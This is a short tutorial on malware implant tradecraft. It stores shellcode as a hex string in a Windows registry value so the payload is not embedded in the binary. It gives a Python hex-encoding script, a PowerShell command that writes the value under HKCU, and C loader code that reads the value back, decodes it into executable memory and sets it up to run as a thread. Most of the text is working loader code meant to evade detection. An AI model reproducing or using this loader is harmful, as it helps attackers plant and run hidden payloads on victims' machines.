Registry Keys

We will store our shellcode as an ASCII hex string in the registry, so the raw bytes are not embedded in the implant binary. At runtime the implant reads the registry value, converts the hex string back into bytes, and executes them.

To convert a raw shellcode file into an ASCII hex string, we can use this Python snippet:

import sys

try:
    # Open in binary mode so the bytes are read untouched
    with open(sys.argv[1], "rb") as shellcode:
        data = bytearray(shellcode.read())
except IOError:
    print("Error reading file")
    sys.exit(1)

# Print the shellcode as uppercase hex, two characters per byte
print("".join("{:02X}".format(c) for c in data))

The output is a hex string; we can store it in a registry value with PowerShell. New-ItemProperty will fail if the key itself does not exist, so create HKCU:\SOFTWARE\regkey first.

New-ItemProperty -Path "HKCU:\SOFTWARE\regkey" -Name "Name" -Value "ASCIISTRING" -PropertyType String -Force

In the implant's C code, we can read the value back from the registry and decode it like so (shellcodesize is the size of the original shellcode in bytes):

// The hex string is two characters per shellcode byte, plus the terminating NUL
DWORD dwAllocationSize = (shellcodesize * 2) + 1;
LPSTR lpData = (LPSTR)VirtualAlloc(NULL, dwAllocationSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

DWORD dwType = REG_SZ;
HKEY hKey = 0;
// The path is relative to HKEY_CURRENT_USER (no "HKCU:" prefix), and backslashes must be escaped in a C string
LPCSTR subkey = "SOFTWARE\\regkey";
if (RegOpenKeyExA(HKEY_CURRENT_USER, subkey, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
    return 1;
// On return, dwAllocationSize holds the number of bytes copied, including the NUL terminator
if (RegQueryValueExA(hKey, "Name", NULL, &dwType, (LPBYTE)lpData, &dwAllocationSize) != ERROR_SUCCESS)
    return 1;
RegCloseKey(hKey);

unsigned char *decodedShellcode = (unsigned char *)VirtualAlloc(NULL, dwAllocationSize / 2, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

// Each pair of hex characters becomes one byte of shellcode
for (DWORD i = 0; i < dwAllocationSize / 2; i++) {
    sscanf_s(lpData + (i * 2), "%2hhx", &decodedShellcode[i]);
}

The decoded shellcode is now in the decodedShellcode buffer.

We can then create a thread that executes the shellcode, or do whatever is applicable to your situation.
